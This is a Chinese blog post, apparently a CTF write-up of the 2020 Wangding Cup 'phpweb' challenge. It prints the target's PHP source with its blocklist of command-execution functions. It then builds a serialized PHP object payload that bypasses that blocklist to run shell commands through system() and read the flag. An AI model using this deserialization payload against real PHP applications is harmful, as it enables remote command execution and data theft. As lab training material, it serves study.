[网鼎杯 2020 朱雀组]phpweb

已于 2024-08-05 11:06:53 修改
阅读量225 收藏 9
点赞数 3
分类专栏: CTF-WEB 文章标签: 网络安全 web安全
于 2024-08-01 11:03:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48149564/article/details/140841164
版权

[网鼎杯 2020 朱雀组]phpweb

在这里插入图片描述

前置知识:

这前置知识都是老演员了

序列化简介:

简单讲,序列化其实就是将数据转换成一种可逆的数据结构,自然,逆向的过程就是反序列化。

举个例子:

现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输等到另一个城市,这时候一般都会把他拆掉成板子,再装到箱子里面,就可以快递出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传传输的形式)。

反序列化

当买家收到货以后,就需要自己把这些板子组装成桌字的样子,这个过程就像反序列化的过程(转化成当初的数据对象)。

打开连接过一会发现报错了,抓个包试试
在这里插入图片描述
发现POST返回中有两个参数func猜测是function ,p是pyload
在这里插入图片描述
使用函数file_get_contents来获取index.php源码
在这里插入图片描述
下面展示代码 源码

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

源码审计发现很多函数都被禁用了最难受的是禁用了system
但是还有file_get_contents、cat、serialize
serialize这里就很重要了因为源码中提供了class类

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

p参数有传了三个值,构造pyload运行如下:

<?php
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $a = new Test();
    $a->p = "ls ../../../";
    $a->p = "find / -name 'flag*'";
    $a->p = "cat /tmp/flagoefiu4r93";
    $a->func = 'system';
    echo (serialize($a));
    ?>


//运行结果
O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

抓包发送pyload得flag
在这里插入图片描述

flag:
flag{deae5b74-dec2-4b19-b161-35a8185a1f94}

栖山️_0x5317
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 1993
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[网鼎杯 2020 朱雀]phpweb 待续
zxnimud5的专栏
09-13 521
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
[网鼎杯 2020 朱雀]phpweb 1
qq_43618536的博客
07-21 627
[网鼎杯 2020 朱雀]phpweb 1
[网鼎杯 2020 朱雀]phpweb1解题思路
xiyuanyue的博客
10-09 171
5、禁用函数未禁用unserialize反序列化函数,构建Test 序列化,O:4:"Test":2:{s:1:"p";s:4:"func";猜测flag 在当前目录的flag.php文件 或者根目录的flag中func=readfile&p=/var/www/html/flag.php func=readfile&p=/var/www/html/flag func=readfile&p=/../.../.../flag均返回无此文件。
buu做题笔记——[网鼎杯 2020 朱雀]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1504
BUU[网鼎杯 2020 朱雀]phpweb [网鼎杯 2020 朱雀]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3028
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
[网鼎杯 2020 朱雀]phpweb1
最新发布
whale_waves的博客
12-04 792
call_user_func函数类似于一种特别的调用函数的方法,它可以调用php内部函数也可以调用用户自定定义的函数。这里我的思路是通过反序列化传入参数绕过网站对func的防护,通过反序列化后执行system函数。call_user_func()这里似乎是利用的这个函数然后执行用户输入的然后去调用内部函数。####这里其实可以通过一个php的特性绕过直接执行命令,但是还是先按着作者的想法来做。随便输了几个函数,他这里就报出了call_user_func()func传输函数,而p则是传输参数的内容。
网鼎杯 2020 朱雀phpweb
gmp的博客
06-08 1149
访问题目: 打开是一个获取时间的页面 查看网页源代码: 也并没有什么有用的,抓包分析: 试着改参数,读取代码:func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch
BUUCTF:[网鼎杯 2020 朱雀]phpweb
qq_46230755的博客
12-17 606
拿到题目访问一下,发现页面会自动刷新 所以我们抓一下包 很明显date是一个php的函数,而p是其中的一个参数,表示输出时间。 因此我们可以执行一下eval函数 很明显,被拦了。这时候我们可以考虑一下读取index.php的源码 利用highlight_file函数 func=highlight_file&p=index.php 得到 完整源码 <!DOCTYPE html> <html> <head> <title>phpweb.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值